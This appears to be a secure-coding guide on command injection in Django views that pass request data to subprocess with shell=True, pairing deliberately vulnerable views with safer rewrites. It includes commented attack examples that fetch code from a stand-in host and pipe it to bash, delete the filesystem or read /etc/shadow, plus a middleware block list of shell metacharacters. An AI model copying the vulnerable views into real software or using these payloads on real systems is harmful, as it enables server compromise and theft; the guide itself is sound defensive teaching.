Command injection from HTTP request data in subprocess call in Django

Critical Risk command-injection
pythondjangocommand-injectionsubprocesshttp-requestshellrce

What it is

A critical security vulnerability where user-controlled request data is passed to subprocess execution, often with shell parsing or dynamic command construction, enabling injection of additional commands or arguments. Command injection could let attackers run arbitrary OS commands, leading to server compromise, data exfiltration, and lateral movement.

# VULNERABLE: Django views with subprocess injection
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import subprocess
import json

# VULNERABLE: File operations endpoint
@csrf_exempt
def file_operations(request):
    if request.method == 'POST':
        operation = request.POST.get('operation', '')
        filename = request.POST.get('filename', '')
        options = request.POST.get('options', '')
        
        if not operation or not filename:
            return JsonResponse({'error': 'Missing parameters'})
        
        try:
            # VULNERABLE: User input in subprocess with shell
            if operation == 'view':
                result = subprocess.run(
                    f'cat {filename}',
                    shell=True,
                    capture_output=True,
                    text=True
                )
            elif operation == 'search':
                pattern = request.POST.get('pattern', '')
                # DANGEROUS: Multiple user inputs
                result = subprocess.run(
                    f'grep "{pattern}" {filename}',
                    shell=True,
                    capture_output=True,
                    text=True
                )
            elif operation == 'backup':
                destination = request.POST.get('destination', '/backup/')
                # VULNERABLE: Command construction with user data
                cmd = f'cp {options} {filename} {destination}'
                result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            else:
                return JsonResponse({'error': 'Unknown operation'})
            
            return JsonResponse({
                'success': result.returncode == 0,
                'output': result.stdout,
                'error': result.stderr
            })
            
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return render(request, 'file_ops.html')

# VULNERABLE: System administration
@csrf_exempt
def system_admin(request):
    if request.method == 'POST':
        command = request.POST.get('command', '')
        args = request.POST.get('args', '')
        
        # EXTREMELY DANGEROUS: Direct command execution
        full_command = f'{command} {args}'
        
        try:
            result = subprocess.run(
                full_command,
                shell=True,
                capture_output=True,
                text=True,
                timeout=30
            )
            
            return JsonResponse({
                'command': full_command,
                'output': result.stdout,
                'error': result.stderr,
                'returncode': result.returncode
            })
            
        except subprocess.TimeoutExpired:
            return JsonResponse({'error': 'Command timeout'})
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return render(request, 'admin.html')

# VULNERABLE: Log analysis
def analyze_logs(request):
    log_file = request.GET.get('file', '/var/log/app.log')
    filter_pattern = request.GET.get('filter', '')
    lines = request.GET.get('lines', '100')
    
    # VULNERABLE: GET parameters in shell command
    command = f'tail -n {lines} {log_file}'
    
    if filter_pattern:
        command += f' | grep "{filter_pattern}"'
    
    try:
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True
        )
        
        return JsonResponse({
            'log_file': log_file,
            'lines_analyzed': lines,
            'filter': filter_pattern,
            'output': result.stdout
        })
        
    except Exception as e:
        return JsonResponse({'error': str(e)})

# URLs configuration
from django.urls import path

urlpatterns = [
    path('file-ops/', file_operations, name='file_operations'),
    path('admin/', system_admin, name='system_admin'),
    path('logs/', analyze_logs, name='analyze_logs'),
]

# Attack examples:
# POST /file-ops/ operation=view&filename=/etc/passwd; wget evil.com/steal
# POST /file-ops/ operation=search&pattern=test&filename=data.txt; rm -rf /
# POST /admin/ command=ls&args=-la; curl evil.com/backdoor | bash
# GET /logs/?file=/var/log/app.log; cat /etc/shadow&filter=error
# SECURE: Django views without subprocess injection
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import permission_required
from django.core.exceptions import ValidationError
from django import forms
import os
import hashlib
from pathlib import Path
import re
import logging

logger = logging.getLogger(__name__)

# SECURE: Form validation
class FileOperationForm(forms.Form):
    OPERATION_CHOICES = [
        ('info', 'File Information'),
        ('hash', 'Calculate Hash'),
        ('lines', 'Count Lines'),
        ('size', 'File Size')
    ]
    
    operation = forms.ChoiceField(choices=OPERATION_CHOICES)
    filename = forms.CharField(max_length=255)
    
    def clean_filename(self):
        filename = self.cleaned_data['filename']
        
        # Strict validation
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise ValidationError('Invalid filename format')
        
        if len(filename) > 255:
            raise ValidationError('Filename too long')
        
        if '..' in filename or filename.startswith('.'):
            raise ValidationError('Invalid filename')
        
        return filename

class LogAnalysisForm(forms.Form):
    LOG_FILE_CHOICES = [
        ('/var/log/app.log', 'Application Log'),
        ('/var/log/error.log', 'Error Log'),
        ('/var/log/access.log', 'Access Log')
    ]
    
    log_file = forms.ChoiceField(choices=LOG_FILE_CHOICES)
    filter_pattern = forms.CharField(max_length=100, required=False)
    lines = forms.IntegerField(min_value=1, max_value=1000, initial=100)
    
    def clean_filter_pattern(self):
        pattern = self.cleaned_data.get('filter_pattern', '')
        
        if pattern:
            # Allow only alphanumeric and basic characters
            if not re.match(r'^[a-zA-Z0-9\s._-]+$', pattern):
                raise ValidationError('Invalid filter pattern')
        
        return pattern

# SECURE: File processor using native Python
class SecureFileProcessor:
    def __init__(self):
        self.safe_directory = Path('/secure/uploads')
        self.max_file_size = 10 * 1024 * 1024  # 10MB
    
    def process_file(self, operation, filename):
        # Get validated file path
        file_path = self.get_safe_file_path(filename)
        
        operations = {
            'info': self.get_file_info,
            'hash': self.calculate_hash,
            'lines': self.count_lines,
            'size': self.get_file_size
        }
        
        return operations[operation](file_path)
    
    def get_safe_file_path(self, filename):
        file_path = (self.safe_directory / filename).resolve()
        
        # Security checks
        if not str(file_path).startswith(str(self.safe_directory.resolve())):
            raise ValueError('File not in safe directory')
        
        if not file_path.exists():
            raise FileNotFoundError('File not found')
        
        if file_path.stat().st_size > self.max_file_size:
            raise ValueError('File too large')
        
        return file_path
    
    def get_file_info(self, file_path):
        stat = file_path.stat()
        return {
            'name': file_path.name,
            'size': stat.st_size,
            'modified': stat.st_mtime,
            'permissions': oct(stat.st_mode)[-3:],
            'extension': file_path.suffix
        }
    
    def calculate_hash(self, file_path):
        with open(file_path, 'rb') as f:
            content = f.read()
        
        return {
            'md5': hashlib.md5(content).hexdigest(),
            'sha256': hashlib.sha256(content).hexdigest(),
            'size': len(content)
        }
    
    def count_lines(self, file_path):
        with open(file_path, 'r', encoding='utf-8') as f:
            lines = sum(1 for _ in f)
        
        return {'lines': lines}
    
    def get_file_size(self, file_path):
        size = file_path.stat().st_size
        return {
            'size_bytes': size,
            'size_human': self.format_size(size)
        }
    
    def format_size(self, size):
        units = ['B', 'KB', 'MB', 'GB']
        for unit in units:
            if size < 1024:
                return f'{size:.2f} {unit}'
            size /= 1024
        return f'{size:.2f} TB'

# SECURE: Log analyzer using native Python
class SecureLogAnalyzer:
    def __init__(self):
        self.allowed_log_files = {
            '/var/log/app.log': 'Application Log',
            '/var/log/error.log': 'Error Log',
            '/var/log/access.log': 'Access Log'
        }
    
    def analyze_log(self, log_file, filter_pattern, lines):
        if log_file not in self.allowed_log_files:
            raise ValueError('Log file not allowed')
        
        if not os.path.exists(log_file):
            raise FileNotFoundError('Log file not found')
        
        # Read log file safely
        matching_lines = []
        
        try:
            with open(log_file, 'r', encoding='utf-8') as f:
                # Read last N lines efficiently
                all_lines = f.readlines()
                recent_lines = all_lines[-lines:] if len(all_lines) > lines else all_lines
                
                for line in recent_lines:
                    if not filter_pattern or filter_pattern.lower() in line.lower():
                        matching_lines.append(line.strip())
        
        except UnicodeDecodeError:
            raise ValueError('Log file contains invalid characters')
        
        return {
            'log_file': log_file,
            'total_lines': len(matching_lines),
            'filter_applied': bool(filter_pattern),
            'lines': matching_lines
        }

# Initialize processors
file_processor = SecureFileProcessor()
log_analyzer = SecureLogAnalyzer()

# SECURE: Views with proper validation
@csrf_protect
@permission_required('app.can_manage_files')
def secure_file_operations(request):
    if request.method == 'POST':
        form = FileOperationForm(request.POST)
        
        if form.is_valid():
            try:
                result = file_processor.process_file(
                    form.cleaned_data['operation'],
                    form.cleaned_data['filename']
                )
                
                # Log successful operation
                logger.info(f'File operation {form.cleaned_data["operation"]} '
                           f'on {form.cleaned_data["filename"]} by {request.user}')
                
                return JsonResponse({
                    'success': True,
                    'operation': form.cleaned_data['operation'],
                    'result': result
                })
                
            except (ValueError, FileNotFoundError) as e:
                return JsonResponse({
                    'success': False,
                    'error': str(e)
                })
            except Exception as e:
                logger.exception(f'File operation error: {e}')
                return JsonResponse({
                    'success': False,
                    'error': 'Operation failed'
                })
        else:
            return JsonResponse({
                'success': False,
                'errors': form.errors
            })
    
    # GET request - show form
    form = FileOperationForm()
    return render(request, 'secure_file_ops.html', {'form': form})

@csrf_protect
@permission_required('app.can_view_logs')
def secure_log_analysis(request):
    if request.method == 'POST':
        form = LogAnalysisForm(request.POST)
        
        if form.is_valid():
            try:
                result = log_analyzer.analyze_log(
                    form.cleaned_data['log_file'],
                    form.cleaned_data['filter_pattern'],
                    form.cleaned_data['lines']
                )
                
                # Log access
                logger.info(f'Log analysis on {form.cleaned_data["log_file"]} '
                           f'by {request.user}')
                
                return JsonResponse({
                    'success': True,
                    'result': result
                })
                
            except (ValueError, FileNotFoundError) as e:
                return JsonResponse({
                    'success': False,
                    'error': str(e)
                })
            except Exception as e:
                logger.exception(f'Log analysis error: {e}')
                return JsonResponse({
                    'success': False,
                    'error': 'Analysis failed'
                })
        else:
            return JsonResponse({
                'success': False,
                'errors': form.errors
            })
    
    # GET request
    form = LogAnalysisForm()
    return render(request, 'secure_log_analysis.html', {'form': form})

# Health check endpoint
def health_check(request):
    return JsonResponse({
        'status': 'healthy',
        'available_operations': ['info', 'hash', 'lines', 'size'],
        'security_features': [
            'Input validation',
            'CSRF protection', 
            'Permission checks',
            'Native Python operations',
            'No subprocess execution'
        ]
    })

# SECURE: URLs with proper naming
from django.urls import path

urlpatterns = [
    path('file-ops/', secure_file_operations, name='secure_file_operations'),
    path('logs/', secure_log_analysis, name='secure_log_analysis'),
    path('health/', health_check, name='health_check'),
]

💡 Why This Fix Works

The vulnerable code uses subprocess.run() with shell=True and user input from Django requests, allowing command injection through form data and URL parameters. The secure version eliminates subprocess usage entirely, implements Django forms with validation, uses native Python file operations, and includes proper authentication and authorization checks.

Why it happens

Using Django request parameters (GET, POST, or path parameters) directly in subprocess.run() calls with shell=True or dynamic command construction. This allows attackers to inject shell metacharacters through HTTP requests.

Root causes

Request Parameters in subprocess.run()

Using Django request parameters (GET, POST, or path parameters) directly in subprocess.run() calls with shell=True or dynamic command construction. This allows attackers to inject shell metacharacters through HTTP requests.

Preview example – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import subprocess

# VULNERABLE: Request data in subprocess
@csrf_exempt
def process_file(request):
    filename = request.GET.get('filename', '')
    operation = request.POST.get('operation', 'cat')
    
    # DANGEROUS: User input in shell command
    result = subprocess.run(
        f'{operation} {filename}',
        shell=True,
        capture_output=True,
        text=True
    )
    
    return JsonResponse({'output': result.stdout})

# Attack: GET /?filename=/etc/passwd; wget evil.com/steal
# Attack: POST operation=cat; rm -rf /; echo

Form Data in Command Construction

Processing Django form data and using it to build subprocess commands without proper validation. Form fields can contain shell metacharacters that alter command execution.

Preview example – PYTHON
from django.shortcuts import render
from django.http import JsonResponse
import subprocess

# VULNERABLE: Form processing with subprocess
def backup_handler(request):
    if request.method == 'POST':
        source = request.POST.get('source')
        destination = request.POST.get('destination')
        options = request.POST.get('options', '')
        
        # DANGEROUS: Form data in command
        command = ['cp'] + options.split() + [source, destination]
        
        # Still vulnerable with argument injection
        result = subprocess.run(command, capture_output=True)
        
        return JsonResponse({
            'success': result.returncode == 0,
            'message': 'Backup completed'
        })
    
    return render(request, 'backup.html')

# Attack: options='--help; rm -rf /; echo'
# Attack: source='/etc/passwd; cat'

Fixes

1

Use Django Forms with Validation

Implement Django forms with comprehensive validation and use subprocess with argument arrays and shell=False. This prevents both injection and provides proper input validation.

View implementation – PYTHON
from django import forms
from django.http import JsonResponse
from django.shortcuts import render
import subprocess
from pathlib import Path
import re

# SECURE: Django form with validation
class FileProcessForm(forms.Form):
    OPERATION_CHOICES = [
        ('info', 'File Info'),
        ('count', 'Line Count'),
        ('checksum', 'Calculate Hash')
    ]
    
    operation = forms.ChoiceField(choices=OPERATION_CHOICES)
    filename = forms.CharField(max_length=255)
    
    def clean_filename(self):
        filename = self.cleaned_data['filename']
        
        # Strict filename validation
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise forms.ValidationError('Invalid filename format')
        
        if '..' in filename:
            raise forms.ValidationError('Directory traversal not allowed')
        
        return filename

def secure_file_process(request):
    if request.method == 'POST':
        form = FileProcessForm(request.POST)
        
        if form.is_valid():
            try:
                result = execute_safe_operation(
                    form.cleaned_data['operation'],
                    form.cleaned_data['filename']
                )
                return JsonResponse({'success': True, 'result': result})
            except Exception as e:
                return JsonResponse({
                    'success': False, 
                    'error': 'Operation failed'
                })
        else:
            return JsonResponse({
                'success': False, 
                'errors': form.errors
            })
    
    return render(request, 'file_process.html', {'form': FileProcessForm()})

def execute_safe_operation(operation, filename):
    # Validate file path
    safe_dir = Path('/safe/uploads')
    file_path = (safe_dir / filename).resolve()
    
    # Ensure file is within safe directory
    if not str(file_path).startswith(str(safe_dir)):
        raise ValueError('File not in safe directory')
    
    if not file_path.exists():
        raise ValueError('File not found')
    
    # Map operations to safe commands
    commands = {
        'info': ['file', str(file_path)],
        'count': ['wc', '-l', str(file_path)],
        'checksum': ['sha256sum', str(file_path)]
    }
    
    # SECURE: subprocess with argument array, no shell
    result = subprocess.run(
        commands[operation],
        capture_output=True,
        text=True,
        timeout=30
    )
    
    if result.returncode != 0:
        raise RuntimeError('Command failed')
    
    return result.stdout.strip()
2

Implement Django Middleware for Security

Create custom Django middleware to validate and sanitize all request data before it reaches views. This provides a centralized security layer.

View implementation – PYTHON
from django.http import JsonResponse
from django.utils.deprecation import MiddlewareMixin
import re
import logging

logger = logging.getLogger(__name__)

class SecurityValidationMiddleware(MiddlewareMixin):
    """Middleware to validate request data for security issues"""
    
    DANGEROUS_PATTERNS = [
        r'[;&|`$(){}\[\]<>]',  # Shell metacharacters
        r'\.\./',              # Directory traversal
        r'\\x[0-9a-fA-F]{2}',  # Hex encoding
        r'\\[0-7]{3}',         # Octal encoding
        r'%[0-9a-fA-F]{2}',    # URL encoding of dangerous chars
        r'(rm|del|format)\s',  # Dangerous commands
        r'(exec|eval)\s*\(',   # Code execution
    ]
    
    def process_request(self, request):
        # Skip validation for certain paths
        skip_paths = ['/admin/', '/static/', '/media/']
        if any(request.path.startswith(path) for path in skip_paths):
            return None
        
        # Validate GET parameters
        for key, value in request.GET.items():
            if self.contains_dangerous_pattern(value):
                logger.warning(f'Dangerous pattern in GET {key}: {value}')
                return JsonResponse({
                    'error': 'Invalid request parameters'
                }, status=400)
        
        # Validate POST data
        if hasattr(request, 'POST'):
            for key, value in request.POST.items():
                if self.contains_dangerous_pattern(value):
                    logger.warning(f'Dangerous pattern in POST {key}: {value}')
                    return JsonResponse({
                        'error': 'Invalid form data'
                    }, status=400)
        
        return None
    
    def contains_dangerous_pattern(self, value):
        if not isinstance(value, str):
            return False
        
        for pattern in self.DANGEROUS_PATTERNS:
            if re.search(pattern, value, re.IGNORECASE):
                return True
        
        return False

# Add to settings.py:
# MIDDLEWARE = [
#     'myapp.middleware.SecurityValidationMiddleware',
#     # ... other middleware
# ]
3

Use Native Python Libraries

Replace subprocess calls with native Python libraries and Django utilities. This eliminates command injection risks entirely while providing better integration with Django.

View implementation – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from django.core.files.storage import default_storage
from django.conf import settings
import hashlib
import os
from pathlib import Path

# SECURE: Native Python file operations
class DjangoFileProcessor:
    def __init__(self):
        self.safe_directory = Path(settings.MEDIA_ROOT) / 'uploads'
        self.max_file_size = 10 * 1024 * 1024  # 10MB
    
    def process_file(self, operation, filename):
        """Process file using native Python operations"""
        
        # Validate filename
        if not self.is_valid_filename(filename):
            raise ValueError('Invalid filename')
        
        # Resolve file path safely
        file_path = self.get_safe_file_path(filename)
        
        # Execute operation
        operations = {
            'info': self.get_file_info,
            'hash': self.calculate_hash,
            'lines': self.count_lines,
            'size': self.get_file_size
        }
        
        if operation not in operations:
            raise ValueError('Operation not supported')
        
        return operations[operation](file_path)
    
    def is_valid_filename(self, filename):
        """Validate filename format"""
        import re
        
        # Allow only safe characters
        pattern = r'^[a-zA-Z0-9._-]+$'
        
        return (re.match(pattern, filename) and
                len(filename) <= 255 and
                not filename.startswith('.') and
                '..' not in filename)
    
    def get_safe_file_path(self, filename):
        """Get validated file path within safe directory"""
        file_path = (self.safe_directory / filename).resolve()
        
        # Ensure file is within safe directory
        if not str(file_path).startswith(str(self.safe_directory.resolve())):
            raise ValueError('File path outside safe directory')
        
        if not file_path.exists():
            raise FileNotFoundError('File not found')
        
        if file_path.stat().st_size > self.max_file_size:
            raise ValueError('File too large')
        
        return file_path
    
    def get_file_info(self, file_path):
        """Get file information using native Python"""
        stat = file_path.stat()
        
        return {
            'name': file_path.name,
            'size': stat.st_size,
            'size_human': self.format_size(stat.st_size),
            'modified': stat.st_mtime,
            'permissions': oct(stat.st_mode)[-3:],
            'is_readable': os.access(file_path, os.R_OK),
            'extension': file_path.suffix
        }
    
    def calculate_hash(self, file_path):
        """Calculate file hash using native Python"""
        hash_algorithms = ['md5', 'sha1', 'sha256']
        hashes = {}
        
        with open(file_path, 'rb') as f:
            content = f.read()
        
        for algorithm in hash_algorithms:
            hasher = hashlib.new(algorithm)
            hasher.update(content)
            hashes[algorithm] = hasher.hexdigest()
        
        return {
            'file': file_path.name,
            'size': len(content),
            'hashes': hashes
        }
    
    def count_lines(self, file_path):
        """Count lines using native Python"""
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                line_count = sum(1 for _ in f)
            
            return {
                'file': file_path.name,
                'lines': line_count,
                'encoding': 'utf-8'
            }
        except UnicodeDecodeError:
            # Try with different encoding
            with open(file_path, 'r', encoding='latin-1') as f:
                line_count = sum(1 for _ in f)
            
            return {
                'file': file_path.name,
                'lines': line_count,
                'encoding': 'latin-1',
                'note': 'File contains non-UTF8 characters'
            }
    
    def get_file_size(self, file_path):
        """Get file size information"""
        size = file_path.stat().st_size
        
        return {
            'file': file_path.name,
            'size_bytes': size,
            'size_human': self.format_size(size)
        }
    
    def format_size(self, size_bytes):
        """Format file size in human readable format"""
        units = ['B', 'KB', 'MB', 'GB', 'TB']
        size = float(size_bytes)
        unit_index = 0
        
        while size >= 1024 and unit_index < len(units) - 1:
            size /= 1024
            unit_index += 1
        
        return f'{size:.2f} {units[unit_index]}'

# Django view using native operations
processor = DjangoFileProcessor()

@csrf_protect
@login_required
def native_file_process(request):
    """Process files using native Python operations"""
    
    if request.method == 'POST':
        operation = request.POST.get('operation')
        filename = request.POST.get('filename')
        
        if not operation or not filename:
            return JsonResponse({
                'success': False,
                'error': 'Operation and filename required'
            })
        
        try:
            result = processor.process_file(operation, filename)
            
            return JsonResponse({
                'success': True,
                'operation': operation,
                'result': result
            })
            
        except (ValueError, FileNotFoundError) as e:
            return JsonResponse({
                'success': False,
                'error': str(e)
            })
        except Exception as e:
            # Log the error but don't expose details
            logger.exception(f'File processing error: {e}')
            return JsonResponse({
                'success': False,
                'error': 'Processing failed'
            })
    
    # GET request - show available operations
    return JsonResponse({
        'available_operations': ['info', 'hash', 'lines', 'size'],
        'max_file_size': processor.max_file_size,
        'safe_directory': str(processor.safe_directory)
    })

Detect This Vulnerability in Your Code

Sourcery automatically identifies command injection from http request data in subprocess call in django and many other security issues in your codebase.